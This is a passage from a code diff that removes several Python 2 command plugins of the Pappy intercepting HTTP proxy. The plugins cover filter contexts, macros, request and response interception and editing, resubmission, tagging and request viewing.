for s in strs:
yield pappyproxy.pappy.main_context.add_filter_string(s)
print 'Set the context to:'
for s in strs:
print ' %s' % s
def delete_filter_set(line):
if line == '':
raise PappyException("Must give name to save filters as")
delete_saved_context(line, pappyproxy.http.dbpool)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def list_filter_set(line):
print 'Saved contexts:'
contexts = yield get_all_saved_contexts(pappyproxy.http.dbpool)
for k in sorted(contexts.keys()):
v = contexts[k]
print '%s' % k
for s in v:
print ' %s' % s
print ''
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'filter_prune': (filter_prune, None),
'scope_list': (scope_list, None),
'scope_delete': (scope_delete, None),
'scope_reset': (scope_reset, None),
'scope_save': (scope_save, None),
'filter_list': (filter_list, None),
'filter_clear': (filter_clear, None),
'filter_up': (filter_up, None),
'builtin_filter': (builtin_filter, complete_builtin_filter),
'filter': (filtercmd, complete_filtercmd),
'save_context': (save_filter_set, None),
'load_context': (load_filter_set, None),
'delete_context': (delete_filter_set, None),
'list_contexts': (list_filter_set, None),
})
cmd.add_aliases([
#('filter_prune', ''),
('scope_list', 'sls'),
#('scope_delete', ''),
('scope_reset', 'sr'),
#('scope_save', ''),
('filter_list', 'fls'),
('filter_clear', 'fc'),
('filter_up', 'fu'),
('builtin_filter', 'fbi'),
('filter', 'f'),
('filter', 'fl'),
('save_context', 'sc'),
('load_context', 'lc'),
('delete_context', 'dc'),
('list_contexts', 'cls'),
])

View file

@ -1,283 +0,0 @@
import crochet
import pappyproxy
import shlex
from pappyproxy.plugin import active_intercepting_macros, add_intercepting_macro, remove_intercepting_macro
from pappyproxy.macros import load_macros, macro_from_requests, MacroTemplate
from pappyproxy.util import PappyException, load_reqlist, autocomplete_startswith
from twisted.internet import defer
loaded_macros = []
loaded_int_macros = []
macro_dict = {}
int_macro_dict = {}
@defer.inlineCallbacks
def gen_macro_helper(line, template=None):
args = shlex.split(line)
if template is None:
fname = args[0]
template_name = args[1]
argstart = 2
else:
fname = args[0]
template_name = template
argstart = 1
if template_name not in MacroTemplate.template_list():
raise PappyException('%s is not a valid template name' % template_name)
script_str = yield MacroTemplate.fill_template_args(template_name, args[argstart:])
fname = MacroTemplate.template_filename(template_name, fname)
with open(fname, 'wc') as f:
f.write(script_str)
print 'Wrote script to %s' % fname
def load_macros_cmd(line):
"""
Load macros from a directory. By default loads macros in the current directory.
Usage: load_macros [dir]
"""
global macro_dict
global int_macro_dict
global loaded_macros
global loaded_int_macros
if line:
load_dir = line
else:
load_dir = '.'
(to_load, int_to_load) = load_macros(load_dir)
if not to_load and not int_to_load:
raise PappyException('No macros to load.')
macro_dict = {}
loaded_macros = []
int_macro_dict = {}
loaded_int_macros = []
for macro in to_load:
if macro.name in macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.name)
elif macro.short_name and macro.short_name in macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.short_name)
elif macro.file_name in macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.file_name)
else:
macro_dict[macro.name] = macro
macro_dict[macro.file_name] = macro
if macro.short_name:
macro_dict[macro.short_name] = macro
loaded_macros.append(macro)
print 'Loaded "%s"' % macro
for macro in int_to_load:
if macro.name in int_macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.name)
elif macro.short_name and macro.short_name in int_macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.short_name)
elif macro.file_name in int_macro_dict:
print 'Name conflict in %s! "%s" already in use, not loading.' % (macro.filename, macro.file_name)
else:
int_macro_dict[macro.name] = macro
int_macro_dict[macro.file_name] = macro
if macro.short_name:
int_macro_dict[macro.short_name] = macro
loaded_int_macros.append(macro)
print 'Loaded "%s"' % macro
def complete_run_macro(text, line, begidx, endidx):
global macro_dict
strs = [k for k,v in macro_dict.iteritems()]
return autocomplete_startswith(text, strs)
def run_macro(line):
"""
Run a macro
Usage: run_macro <macro name or macro short name>
"""
global macro_dict
global loaded_macros
args = shlex.split(line)
if not args:
raise PappyException('You must give a macro to run. You can give its short name, or the name in the filename.')
mname = args[0]
if mname not in macro_dict:
raise PappyException('%s not a loaded macro' % mname)
macro = macro_dict[mname]
macro.execute(args[1:])
def complete_run_int_macro(text, line, begidx, endidx):
global int_macro_dict
global loaded_int_macros
running = []
not_running = []
for macro in loaded_int_macros:
if macro.name in [m.name for m in active_intercepting_macros()]:
running.append(macro)
else:
not_running.append(macro)
strs = []
for m in not_running:
strs.append(macro.name)
strs.append(macro.file_name)
if macro.short_name:
strs.append(macro.short_name)
return autocomplete_startswith(text, strs)
def run_int_macro(line):
"""
Activate an intercepting macro
Usage: run_int_macro <macro name or macro short name>
Macro can be stopped with stop_int_macro
"""
global int_macro_dict
global loaded_int_macros
args = shlex.split(line)
if len(args) == 0:
raise PappyException('You must give an intercepting macro to run. You can give its short name, or the name in the filename.')
if args[0] not in int_macro_dict:
raise PappyException('%s not a loaded intercepting macro' % line)
macro = int_macro_dict[args[0]]
try:
macro.init(args[1:])
add_intercepting_macro(macro.name, macro)
print '"%s" started' % macro.name
except Exception as e:
print 'Error initializing macro:'
raise e
def complete_stop_int_macro(text, line, begidx, endidx):
global int_macro_dict
global loaded_int_macros
running = []
not_running = []
for macro in loaded_int_macros:
if macro.name in [m.name for m in active_intercepting_macros()]:
running.append(macro)
else:
not_running.append(macro)
strs = []
for m in running:
strs.append(macro.name)
strs.append(macro.file_name)
if macro.short_name:
strs.append(macro.short_name)
return autocomplete_startswith(text, strs)
def stop_int_macro(line):
"""
Stop a running intercepting macro
Usage: stop_int_macro <macro name or macro short name>
"""
global int_macro_dict
global loaded_int_macros
if not line:
raise PappyException('You must give an intercepting macro to run. You can give its short name, or the name in the filename.')
if line not in int_macro_dict:
raise PappyException('%s not a loaded intercepting macro' % line)
macro = int_macro_dict[line]
remove_intercepting_macro(macro.name)
print '"%s" stopped' % macro.name
def list_int_macros(line):
"""
List all active/inactive intercepting macros
"""
global int_macro_dict
global loaded_int_macros
running = []
not_running = []
for macro in loaded_int_macros:
if macro.name in [m.name for m in active_intercepting_macros()]:
running.append(macro)
else:
not_running.append(macro)
if not running and not not_running:
print 'No loaded intercepting macros'
if running:
print 'Active intercepting macros:'
for m in running:
print ' %s' % m
if not_running:
print 'Inactive intercepting macros:'
for m in not_running:
print ' %s' % m
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def generate_macro(line):
"""
Generate a macro script with request objects
Usage: generate_macro <name> [reqs]
"""
yield gen_macro_helper(line, template='macro')
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def generate_int_macro(line):
"""
Generate an intercepting macro script
Usage: generate_int_macro <name>
"""
yield gen_macro_helper(line, template='intmacro')
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def generate_template_macro(line):
"""
Generate a macro from a built in template
Usage: generate_template_macro <fname> <template> [args]
"""
if line == '':
print 'Usage: gtma <fname> <template> [args]'
print 'Macro templates:'
templates = MacroTemplate.template_list()
templates.sort()
for t in templates:
if MacroTemplate.template_argstring(t):
print '"%s %s" - %s' % (t, MacroTemplate.template_argstring(t), MacroTemplate.template_description(t))
else:
print '"%s" - %s' % (t, MacroTemplate.template_description(t))
else:
yield gen_macro_helper(line)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def rpy(line):
"""
Copy python object definitions of requests.
Usage: rpy <reqs>
"""
reqs = yield load_reqlist(line)
for req in reqs:
print pappyproxy.macros.req_obj_def(req)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'rpy': (rpy, None),
'generate_int_macro': (generate_int_macro, None),
'generate_macro': (generate_macro, None),
'generate_template_macro': (generate_template_macro, None),
'list_int_macros': (list_int_macros, None),
'stop_int_macro': (stop_int_macro, complete_stop_int_macro),
'run_int_macro': (run_int_macro, complete_run_int_macro),
'run_macro': (run_macro, complete_run_macro),
'load_macros': (load_macros_cmd, None),
})
cmd.add_aliases([
#('rpy', ''),
('generate_int_macro', 'gima'),
('generate_macro', 'gma'),
('generate_template_macro', 'gtma'),
('list_int_macros', 'lsim'),
('stop_int_macro', 'sim'),
('run_int_macro', 'rim'),
('run_macro', 'rma'),
('load_macros', 'lma'),
])

View file

@ -1,292 +0,0 @@
import crochet
import curses
import os
import pappyproxy
import shlex
import subprocess
import tempfile
from pappyproxy.util import PappyException
from pappyproxy.macros import InterceptMacro
from pappyproxy.http import Request, Response
from pappyproxy.plugin import add_intercepting_macro, remove_intercepting_macro
from pappyproxy import pappy
from twisted.internet import defer
PLUGIN_ID="manglecmds"
edit_queue = []
class MangleInterceptMacro(InterceptMacro):
"""
A class representing a macro that modifies requests as they pass through the
proxy
"""
def __init__(self):
InterceptMacro.__init__(self)
self.name = 'Pappy Interceptor Macro'
self.intercept_requests = False
self.intercept_responses = False
self.intercept_ws = False
self.async_req = True
self.async_rsp = True
self.async_ws = True
def __repr__(self):
return "<MangleInterceptingMacro>"
@defer.inlineCallbacks
def async_mangle_request(self, request):
# This function gets called to mangle/edit requests passed through the proxy
retreq = request
# Write original request to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(request.full_request)
# Have the console edit the file
yield edit_file(tfName)
# Create new mangled request from edited file
with open(tfName, 'r') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
pappyproxy.proxy.log('Request dropped!')
defer.returnValue(None)
mangled_req = Request(text, update_content_length=True)
mangled_req._host = request.host
mangled_req.port = request.port
mangled_req.is_ssl = request.is_ssl
# Check if it changed
if mangled_req.full_request != request.full_request:
retreq = mangled_req
defer.returnValue(retreq)
@defer.inlineCallbacks
def async_mangle_response(self, request):
# This function gets called to mangle/edit respones passed through the proxy
retrsp = request.response
# Write original response to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(request.response.full_response)
# Have the console edit the file
yield edit_file(tfName, front=True)
# Create new mangled response from edited file
with open(tfName, 'r') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
pappyproxy.proxy.log('Response dropped!')
defer.returnValue(None)
mangled_rsp = Response(text, update_content_length=True)
if mangled_rsp.full_response != request.response.full_response:
mangled_rsp.unmangled = request.response
retrsp = mangled_rsp
defer.returnValue(retrsp)
@defer.inlineCallbacks
def async_mangle_ws(self, request, message):
# This function gets called to mangle/edit respones passed through the proxy
retmsg = message
# Write original message to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(retmsg.contents)
# Have the console edit the file
yield edit_file(tfName, front=True)
# Create new mangled message from edited file
with open(tfName, 'r') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
pappyproxy.proxy.log('Websocket message dropped!')
defer.returnValue(None)
mangled_message = message.copy()
mangled_message.contents = text
if mangled_message.contents != message.contents:
retmsg = mangled_message
defer.returnValue(retmsg)
###############
## Helper funcs
def edit_file(fname, front=False):
global edit_queue
# Adds the filename to the edit queue. Returns a deferred that is fired once
# the file is edited and the editor is closed
d = defer.Deferred()
if front:
edit_queue = [(fname, d)] + edit_queue
else:
edit_queue.append((fname, d))
return d
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def check_reqid(reqid):
# Used for the repeater command. Must not be async
try:
yield pappyproxy.http.Request.load_request(reqid)
except:
raise PappyException('"%s" is not a valid request id' % reqid)
defer.returnValue(None)
def start_editor(reqid):
script_loc = os.path.join(pappy.session.config.pappy_dir, "plugins", "vim_repeater", "repeater.vim")
subprocess.call(["vim", "-S", script_loc, "-c", "RepeaterSetup %s %d"%(reqid, pappy.session.comm_port)])
####################
## Command functions
def repeater(line):
"""
Open a request in the repeater
Usage: repeater <reqid>
"""
# This is not async on purpose. start_editor acts up if this is called
# with inline callbacks. As a result, check_reqid and get_unmangled
# cannot be async
args = shlex.split(line)
reqid = args[0]
check_reqid(reqid)
start_editor(reqid)
def intercept(line):
"""
Intercept requests and/or responses and edit them with before passing them along
Usage: intercept <reqid>
"""
global edit_queue
args = shlex.split(line)
intercept_requests = False
intercept_responses = False
intercept_ws = True
intercept_ws
req_names = ('req', 'request', 'requests')
rsp_names = ('rsp', 'response', 'responses')
ws_names = ('ws', 'websocket')
if any(a in req_names for a in args):
intercept_requests = True
if any(a in rsp_names for a in args):
intercept_responses = True
if any(a in req_names for a in args):
intercept_ws = True
if not args:
intercept_requests = True
intercepting = []
if intercept_requests:
intercepting.append('Requests')
if intercept_responses:
intercepting.append('Responses')
if intercept_ws:
intercepting.append('Websocket Messages')
if not intercept_requests and not intercept_responses and not intercept_ws:
intercept_str = 'NOTHING'
else:
intercept_str = ', '.join(intercepting)
mangle_macro = MangleInterceptMacro()
mangle_macro.intercept_requests = intercept_requests
mangle_macro.intercept_responses = intercept_responses
mangle_macro.intercept_ws = intercept_ws
add_intercepting_macro('pappy_intercept', mangle_macro)
## Interceptor loop
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
try:
editnext = False
stdscr.nodelay(True)
while True:
stdscr.addstr(0, 0, "Currently intercepting: %s" % intercept_str)
stdscr.clrtoeol()
stdscr.addstr(1, 0, "%d item(s) in queue." % len(edit_queue))
stdscr.clrtoeol()
if editnext:
stdscr.addstr(2, 0, "Waiting for next item... Press 'q' to quit or 'b' to quit waiting")
else:
stdscr.addstr(2, 0, "Press 'n' to edit the next item or 'q' to quit interceptor.")
stdscr.clrtoeol()
c = stdscr.getch()
if c == ord('q'):
break
elif c == ord('n'):
editnext = True
elif c == ord('b'):
editnext = False
if editnext and edit_queue:
editnext = False
(to_edit, deferred) = edit_queue.pop(0)
editor = 'vi'
if 'EDITOR' in os.environ:
editor = os.environ['EDITOR']
additional_args = []
if editor == 'vim':
# prevent adding additional newline
additional_args.append('-b')
subprocess.call([editor, to_edit] + additional_args)
stdscr.clear()
deferred.callback(None)
finally:
curses.nocbreak()
stdscr.keypad(0)
curses.echo()
curses.endwin()
try:
remove_intercepting_macro('pappy_intercept')
except PappyException:
pass
# Send remaining requests along
while len(edit_queue) > 0:
(fname, deferred) = edit_queue.pop(0)
deferred.callback(None)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'intercept': (intercept, None),
'repeater': (repeater, None),
})
cmd.add_aliases([
('intercept', 'ic'),
('repeater', 'rp'),
])

View file

@ -1,275 +0,0 @@
import argparse
import crochet
import pappyproxy
import shlex
import sys
from pappyproxy.colors import Colors, Styles, path_formatter, host_color, scode_color, verb_color
from pappyproxy.util import PappyException, remove_color, confirm, load_reqlist, Capturing
from pappyproxy.macros import InterceptMacro
from pappyproxy.requestcache import RequestCache
from pappyproxy.session import Session
from pappyproxy.pappy import session
from pappyproxy.plugin import add_intercepting_macro, remove_intercepting_macro, add_to_history
from pappyproxy.http import async_submit_requests, Request
from twisted.internet import defer
from twisted.enterprise import adbapi
class PrintStreamInterceptMacro(InterceptMacro):
"""
Intercepting macro that prints requests and responses as they go through
the proxy
"""
def __init__(self):
InterceptMacro.__init__(self)
self.name = 'Pappy Interceptor Macro'
self.intercept_requests = False
self.intercept_responses = False
self.async_req = False
self.async_rsp = False
def __repr__(self):
return "<PrintStreamInterceptingMacro>"
@staticmethod
def _print_request(req):
s = verb_color(req.verb)+'> '+req.verb+' '+Colors.ENDC
s += req.url_color
s += ', len=' + str(len(req.body))
print s
sys.stdout.flush()
@staticmethod
def _print_response(req):
response_code = str(req.response.response_code) + \
' ' + req.response.response_text
s = scode_color(response_code)
s += '< '
s += response_code
s += Colors.ENDC
s += ' '
s += req.url_color
s += ', len=' + str(len(req.response.body))
print s
sys.stdout.flush()
def mangle_request(self, request):
PrintStreamInterceptMacro._print_request(request)
return request
def mangle_response(self, request):
PrintStreamInterceptMacro._print_response(request)
return request.response
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def clrmem(line):
"""
Delete all in-memory only requests
Usage: clrmem
"""
to_delete = list(pappyproxy.http.Request.cache.inmem_reqs)
for r in to_delete:
try:
yield r.deep_delete()
except PappyException as e:
print str(e)
def gencerts(line):
"""
Generate CA cert and private CA file
Usage: gencerts [/path/to/put/certs/in]
"""
dest_dir = line or pappyproxy.pappy.session.config.cert_dir
message = "This will overwrite any existing certs in %s. Are you sure?" % dest_dir
if not confirm(message, 'n'):
return False
print "Generating certs to %s" % dest_dir
pappyproxy.proxy.generate_ca_certs(dest_dir)
def log(line):
"""
Display the log in real time. Honestly it probably doesn't work.
Usage: log [verbosity (default is 1)]
verbosity=1: Show connections as they're made/lost, some additional info
verbosity=3: Show full requests/responses as they are processed by the proxy
"""
try:
verbosity = int(line.strip())
except:
verbosity = 1
pappyproxy.pappy.session.config.debug_verbosity = verbosity
raw_input()
pappyproxy.pappy.session.config.debug_verbosity = 0
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def save(line):
args = shlex.split(line)
reqids = args[0]
reqs = yield load_reqlist(reqids)
for req in reqs:
yield req.async_deep_save()
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def export(line):
"""
Write the full request/response of a request/response to a file.
Usage: export [req|rsp] <reqid(s)>
"""
args = shlex.split(line)
if len(args) < 2:
print 'Requires req/rsp and and request id(s)'
defer.returnValue(None)
if args[0] not in ('req', 'rsp'):
raise PappyException('Request or response not specified')
reqs = yield load_reqlist(args[1])
for req in reqs:
try:
if args[0] == 'req':
fname = 'req_%s.txt'%req.reqid
with open(fname, 'w') as f:
f.write(req.full_request)
print 'Full request written to %s' % fname
elif args[0] == 'rsp':
fname = 'rsp_%s.txt'%req.reqid
with open(fname, 'w') as f:
f.write(req.full_response)
print 'Full response written to %s' % fname
except PappyException as e:
print 'Unable to export %s: %s' % (req.reqid, e)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def merge_datafile(line):
"""
Add all the requests/responses from another data file to the current one
"""
def set_text_factory(conn):
conn.text_factory = str
line = line.strip()
other_dbpool = adbapi.ConnectionPool("sqlite3", line,
check_same_thread=False,
cp_openfun=set_text_factory,
cp_max=1)
try:
count = 0
other_cache = RequestCache(cust_dbpool=other_dbpool)
yield other_cache.load_ids()
for req_d in other_cache.req_it():
count += 1
req = yield req_d
r = req.copy()
yield r.async_deep_save()
print 'Added %d requests' % count
finally:
other_dbpool.close()
def watch_proxy(line):
print 'Watching proxy... press ENTER to exit'
macro = PrintStreamInterceptMacro()
macro.intercept_requests = True
macro.intercept_responses = True
try:
add_intercepting_macro('pappy_watch_proxy', macro)
raw_input()
finally:
try:
remove_intercepting_macro('pappy_watch_proxy')
except PappyException:
pass
def run_without_color(line):
with Capturing() as output:
session.cons.onecmd(line.strip())
print remove_color(output.val)
def version(line):
import pappyproxy
print pappyproxy.__version__
@crochet.wait_for(timeout=180.0)
@defer.inlineCallbacks
def submit(line):
"""
Resubmit some requests, optionally with modified headers and cookies.
Usage: submit reqids [-h] [-m] [-u] [-p] [-o REQID] [-c [COOKIES [COOKIES ...]]] [-d [HEADERS [HEADERS ...]]]
"""
parser = argparse.ArgumentParser(prog="submit", usage=submit.__doc__)
parser.add_argument('reqids')
parser.add_argument('-m', '--inmem', action='store_true', help='Store resubmitted requests in memory without storing them in the data file')
parser.add_argument('-u', '--unique', action='store_true', help='Only resubmit one request per endpoint (different URL parameters are different endpoints)')
parser.add_argument('-p', '--uniquepath', action='store_true', help='Only resubmit one request per endpoint (ignoring URL parameters)')
parser.add_argument('-c', '--cookies', nargs='*', help='Apply a cookie to requests before submitting')
parser.add_argument('-d', '--headers', nargs='*', help='Apply a header to requests before submitting')
parser.add_argument('-o', '--copycookies', help='Copy the cookies used in another request')
args = parser.parse_args(shlex.split(line))
headers = {}
cookies = {}
clear_cookies = False
if args.headers:
for h in args.headers:
k, v = h.split('=', 1)
headers[k] = v
if args.copycookies:
reqid = args.copycookies
req = yield Request.load_request(reqid)
clear_cookies = True
for k, v in req.cookies.all_pairs():
cookies[k] = v
if args.cookies:
for c in args.cookies:
k, v = c.split('=', 1)
cookies[k] = v
if args.unique and args.uniquepath:
raise PappyException('Both -u and -p cannot be given as arguments')
newsession = Session(cookie_vals=cookies, header_vals=headers)
reqs = yield load_reqlist(args.reqids)
for req in reqs:
if clear_cookies:
req.cookies.clear()
newsession.apply_req(req)
conf_message = "You're about to submit %d requests, continue?" % len(reqs)
if not confirm(conf_message):
defer.returnValue(None)
for r in reqs:
r.tags.add('resubmitted')
save = not args.inmem
yield async_submit_requests(reqs, save=save, save_in_mem=args.inmem,
unique_paths=args.uniquepath, unique_path_and_args=args.unique)
def load_cmds(cmd):
cmd.set_cmds({
'clrmem': (clrmem, None),
'gencerts': (gencerts, None),
'sv': (save, None),
'export': (export, None),
'log': (log, None),
'merge': (merge_datafile, None),
'nocolor': (run_without_color, None),
'watch': (watch_proxy, None),
'version': (version, None),
'submit': (submit, None)
})
cmd.add_aliases([
#('rpy', ''),
])

View file

@ -1,102 +0,0 @@
import crochet
import pappyproxy
import shlex
from pappyproxy.plugin import async_main_context_ids
from pappyproxy.util import PappyException, load_reqlist
from twisted.internet import defer
from pappyproxy.http import Request
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def tag(line):
"""
Add a tag to requests.
Usage: tag <tag> [request ids]
You can tag as many requests as you want at the same time. If no
ids are given, the tag will be applied to all in-context requests.
"""
args = shlex.split(line)
if len(args) == 0:
raise PappyException('Tag name is required')
tag = args[0]
if len(args) > 1:
reqids = yield load_reqlist(args[1], False, ids_only=True)
print 'Tagging %s with %s' % (', '.join(reqids), tag)
else:
print "Tagging all in-context requests with %s" % tag
reqids = yield async_main_context_ids()
for reqid in reqids:
req = yield Request.load_request(reqid)
if tag not in req.tags:
req.tags.add(tag)
if req.saved:
yield req.async_save()
else:
print 'Request %s already has tag %s' % (req.reqid, tag)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def untag(line):
"""
Remove a tag from requests
Usage: untag <tag> <request ids>
You can provide as many request ids as you want and the tag will
be removed from all of them. If no ids are given, the tag will
be removed from all in-context requests.
"""
args = shlex.split(line)
if len(args) == 0:
raise PappyException("Tag and request ids are required")
tag = args[0]
ids = []
if len(args) > 1:
reqids = yield load_reqlist(args[1], False, ids_only=True)
print 'Removing tag %s from %s' % (tag, ', '.join(reqids))
else:
print "Removing tag %s from all in-context requests" % tag
reqids = yield async_main_context_ids()
for reqid in reqids:
req = yield Request.load_request(reqid)
if tag in req.tags:
req.tags.discard(tag)
if req.saved:
yield req.async_save()
if ids:
print 'Tag %s removed from %s' % (tag, ', '.join(ids))
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def clrtag(line):
"""
Clear all the tags from requests
Usage: clrtag <request ids>
"""
args = shlex.split(line)
if len(args) == 0:
raise PappyException('No request IDs given')
reqs = yield load_reqlist(args[0], False)
for req in reqs:
if req.tags:
req.tags = set()
print 'Tags cleared from request %s' % (req.reqid)
if req.saved:
yield req.async_save()
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'clrtag': (clrtag, None),
'untag': (untag, None),
'tag': (tag, None),
})
cmd.add_aliases([
#('rpy', ''),
])

View file

@ -1,651 +0,0 @@
import crochet
import datetime
import json
import pappyproxy
import pygments
import pprint
import re
import shlex
import urllib
from pappyproxy.util import PappyException, utc2local, load_reqlist, print_table, print_request_rows, get_req_data_row, datetime_string, maybe_hexdump
from pappyproxy.http import Request, repeatable_parse_qs
from twisted.internet import defer
from pappyproxy.plugin import async_main_context_ids
from pappyproxy.colors import Colors, Styles, verb_color, scode_color, path_formatter, host_color
from pygments.formatters import TerminalFormatter
from pygments.lexers.data import JsonLexer
from pygments.lexers.html import XmlLexer
###################
## Helper functions
def view_full_message(request, headers_only=False, try_ws=False):
def _print_message(mes):
print_str = ''
if mes.direction == 'INCOMING':
print_str += Colors.BLUE
print_str += '< Incoming'
elif mes.direction == 'OUTGOING':
print_str += Colors.GREEN
print_str += '> Outgoing'
else:
print_str += Colors.RED
print_str += '? ERROR: Unknown direction'
if mes.unmangled:
print_str += ', mangled'
print_str += ', binary = %s\n' % mes.is_binary
print_str += Colors.ENDC
print_str += maybe_hexdump(mes.contents)
print_str += '\n'
return print_str
if headers_only:
print request.headers_section_pretty
else:
if try_ws and request.websocket_messages:
print_str = ''
print_str += Styles.TABLE_HEADER
print_str += "Websocket session handshake\n"
print_str += Colors.ENDC
print_str += request.full_message_pretty
print_str += '\n'
print_str += Styles.TABLE_HEADER
print_str += "Websocket session \n"
print_str += Colors.ENDC
for mes in request.websocket_messages:
print_str += _print_message(mes)
if mes.unmangled:
print_str += Colors.YELLOW
print_str += '-'*10
print_str += Colors.ENDC
print_str += ' ^^ UNMANGLED ^^ '
print_str += Colors.YELLOW
print_str += '-'*10
print_str += Colors.ENDC
print_str += '\n'
print_str += _print_message(mes.unmangled)
print_str += Colors.YELLOW
print_str += '-'*20 + '-'*len(' ^^ UNMANGLED ^^ ')
print_str += '\n'
print_str += Colors.ENDC
print print_str
else:
print request.full_message_pretty
def print_request_extended(request):
# Prints extended info for the request
title = "Request Info (reqid=%s)" % request.reqid
print Styles.TABLE_HEADER + title + Colors.ENDC
reqlen = len(request.body)
reqlen = '%d bytes' % reqlen
rsplen = 'No response'
mangle_str = 'Nothing mangled'
if request.unmangled:
mangle_str = 'Request'
if request.response:
response_code = str(request.response.response_code) + \
' ' + request.response.response_text
response_code = scode_color(response_code) + response_code + Colors.ENDC
rsplen = len(request.response.body)
rsplen = '%d bytes' % rsplen
if request.response.unmangled:
if mangle_str == 'Nothing mangled':
mangle_str = 'Response'
else:
mangle_str += ' and Response'
else:
response_code = ''
time_str = '--'
if request.time_start and request.time_end:
time_delt = request.time_end - request.time_start
time_str = "%.2f sec" % time_delt.total_seconds()
if request.is_ssl:
is_ssl = 'YES'
else:
is_ssl = 'NO'
if request.time_start:
time_made_str = datetime_string(request.time_start)
else:
time_made_str = '--'
verb = verb_color(request.verb) + request.verb + Colors.ENDC
host = host_color(request.host) + request.host + Colors.ENDC
print_pairs = []
print_pairs.append(('Made on', time_made_str))
print_pairs.append(('ID', request.reqid))
print_pairs.append(('URL', request.url_color))
print_pairs.append(('Host', host))
print_pairs.append(('Path', path_formatter(request.full_path)))
print_pairs.append(('Verb', verb))
print_pairs.append(('Status Code', response_code))
print_pairs.append(('Request Length', reqlen))
print_pairs.append(('Response Length', rsplen))
if request.response and request.response.unmangled:
print_pairs.append(('Unmangled Response Length', len(request.response.unmangled.full_response)))
print_pairs.append(('Time', time_str))
print_pairs.append(('Port', request.port))
print_pairs.append(('SSL', is_ssl))
print_pairs.append(('Mangled', mangle_str))
print_pairs.append(('Tags', ', '.join(request.tags)))
if request.plugin_data:
print_pairs.append(('Plugin Data', request.plugin_data))
for k, v in print_pairs:
print Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v)
def print_tree(tree):
# Prints a tree. Takes in a sorted list of path tuples
_print_tree_helper(tree, 0, [])
def guess_pretty_print_fmt(msg):
if 'content-type' in msg.headers:
if 'json' in msg.headers['content-type']:
return 'json'
elif 'www-form' in msg.headers['content-type']:
return 'form'
elif 'application/xml' in msg.headers['content-type']:
return 'xml'
return 'text'
def pretty_print_body(fmt, body):
try:
if fmt.lower() == 'json':
d = json.loads(body.strip())
s = json.dumps(d, indent=4, sort_keys=True)
print pygments.highlight(s, JsonLexer(), TerminalFormatter())
elif fmt.lower() == 'form':
qs = repeatable_parse_qs(body)
for k, v in qs.all_pairs():
s = Colors.GREEN
s += '%s: ' % urllib.unquote(k)
s += Colors.ENDC
s += urllib.unquote(v)
print s
elif fmt.lower() == 'text':
print body
elif fmt.lower() == 'xml':
import xml.dom.minidom
xml = xml.dom.minidom.parseString(body)
print pygments.highlight(xml.toprettyxml(), XmlLexer(), TerminalFormatter())
else:
raise PappyException('"%s" is not a valid format' % fmt)
except PappyException as e:
raise e
except:
raise PappyException('Body could not be parsed as "%s"' % fmt)
def _get_tree_prefix(depth, print_bars, last):
if depth == 0:
return u''
else:
ret = u''
pb = print_bars + [True]
for i in range(depth):
if pb[i]:
ret += u'\u2502 '
else:
ret += u' '
if last:
ret += u'\u2514\u2500\u2500 '
else:
ret += u'\u251c\u2500\u2500 '
return ret
def _print_tree_helper(tree, depth, print_bars):
# Takes in a tree and prints it at the given depth
if tree == [] or tree == [()]:
return
while tree[0] == ():
tree = tree[1:]
if tree == [] or tree == [()]:
return
if len(tree) == 1 and len(tree[0]) == 1:
print _get_tree_prefix(depth, print_bars + [False], True) + tree[0][0]
return
curkey = tree[0][0]
subtree = []
for row in tree:
if row[0] != curkey:
if curkey == '':
curkey = '/'
print _get_tree_prefix(depth, print_bars, False) + curkey
if depth == 0:
_print_tree_helper(subtree, depth+1, print_bars + [False])
else:
_print_tree_helper(subtree, depth+1, print_bars + [True])
curkey = row[0]
subtree = []
subtree.append(row[1:])
if curkey == '':
curkey = '/'
print _get_tree_prefix(depth, print_bars, True) + curkey
_print_tree_helper(subtree, depth+1, print_bars + [False])
def print_params(req, params=None):
if not req.url_params.all_pairs() and not req.body:
print 'Request %s has no url or data parameters' % req.reqid
print ''
if req.url_params.all_pairs():
print Styles.TABLE_HEADER + "Url Params" + Colors.ENDC
for k, v in req.url_params.all_pairs():
if params is None or (params and k in params):
print Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v)
print ''
if req.body:
print Styles.TABLE_HEADER + "Body/POST Params" + Colors.ENDC
pretty_print_body(guess_pretty_print_fmt(req), req.body)
print ''
if req.cookies.all_pairs():
print Styles.TABLE_HEADER + "Cookies" + Colors.ENDC
for k, v in req.cookies.all_pairs():
if params is None or (params and k in params):
print Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v)
print ''
# multiform request when we support it
def add_param(found_params, kind, k, v, reqid):
if not k in found_params:
found_params[k] = {}
